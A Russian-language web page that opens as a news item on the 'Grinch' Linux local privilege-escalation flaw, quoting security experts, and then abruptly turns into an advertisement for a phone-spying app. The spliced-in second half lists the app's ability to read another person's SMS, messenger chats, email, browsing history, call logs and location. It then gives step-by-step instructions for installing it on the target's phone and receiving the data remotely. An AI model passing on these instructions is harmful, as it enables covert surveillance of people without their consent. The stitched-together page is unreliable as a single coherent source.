Grinch – новая уязвимость системы Linux

018 Получившая название Grinch уязвимость может затронуть подавляющее большинство пользователей системы Linux, так считают специалисты. Также есть основания полагать, что эта программная брешь работает и на некоторых мобильных устройствах, ПО которого основано на Linux. Чисто теоретически, туда можно отнести большую часть Android смартфонов и планшетов! Безопасность данной платформы находится в серьёзной угрозе, как отмечают эксперты. При этом заплатка пока не разработана, ведущие специалисты не суетятся.

Но если сравнивать уязвимость с широко известными Heartbleed или Shellshock, область её действия значительно сужена. Всё дело в том, что брешь направлена только на локальных пользователей. Она способна повышать привилегии юзера в системе, давать ему различные права и возможности, вплоть до полной компрометации всей ОС Linux на отдельно взятой машине. В отчётах Alert Logic по данной проблеме сказано, что никакого удалённого доступа производиться не может, да и работа через Интернет видится весьма сомнительной.

Глава SANS Internet Storm Center в своём заявлении отметил, что «отвлекаться от шоппинга в Рождество смысла нет, проблема небольшая, её вполне можно устранить в январе». Так считает Йоханнес Ульрих, видный специалист по вопросам безопасности в сети Интернет, чья деятельность зачастую затрагивает и платформу Linux тоже. Что же касается обычных пользователей, рисков взлома их системы через Grinch практически нет, только если злоумышленник не получит прямой доступ к компьютеру жертвы. Полем для атаки могут быть и локальные домашние сети, но лишь при наличии открытых портов и отсутствии файервола на целевой машине. Это общий вопрос безопасности, который в Linux традиционно реализован на более высоком уровня, чем для семейства Windows.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.